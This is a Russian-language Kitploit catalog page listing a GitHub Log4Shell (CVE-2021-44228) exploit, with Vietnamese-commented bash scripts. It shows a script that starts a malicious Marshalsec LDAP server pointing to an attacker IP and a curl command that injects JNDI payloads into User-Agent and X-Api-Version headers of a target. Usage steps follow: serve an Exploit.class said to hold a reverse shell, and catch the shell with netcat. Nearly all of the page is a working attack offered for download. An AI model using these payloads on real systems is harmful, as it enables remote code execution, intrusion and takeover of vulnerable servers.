Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228-Log4Shell- — Тестирование на проникновение | Kitploit
Инструменты/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеИнструмент Удаленного Доступа
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

Тестирование на проникновение

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44228-Log4Shell-

Тестирование на проникновение

  1. Создание вредоносного LDAP-сервера (с помощью Marshalsec)
root@kitploit:~
#!/bin/bash
# Script: start_ldap_server.sh
# Yêu cầu: Cài đặt Java và Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389"
HTTP_PORT="8000"
ATTACKER_IP="192.168.0.101"
REVERSE_PORT="5555"

echo "[+] Khởi động LDAP server độc hại trên port $LDAP_PORT..."
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \
  "http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT
  1. Отправка полезной нагрузки Log4Shell с захваченного веб-сервера
root@kitploit:~
#!/bin/bash
# Script: exploit_log4shell.sh
# Mục tiêu: Gửi payload JNDI đến máy trạm Windows

TARGET_IP="192.168.1.10"
ATTACKER_IP="192.168.0.101"
LDAP_PORT="1389"

echo "[+] Gửi payload Log4Shell đến $TARGET_IP..."
curl -X GET \
  "http://$TARGET_IP" \
  -H "User-Agent: \${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}" \
  -H "X-Api-Version: \${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

Использование

Запуск LDAP-сервера:

root@kitploit:~
./start_ldap_server.sh

Запуск HTTP-сервера для размещения файла Exploit.class (содержащего reverse shell):

root@kitploit:~
python3 -m http.server 8000

Отправка полезной нагрузки с захваченного веб-сервера

root@kitploit:~
./exploit_log4shell.sh

Прослушивание reverse shell на атакующей машине:

root@kitploit:~
nc -lvnp 5555
Скачать инструмент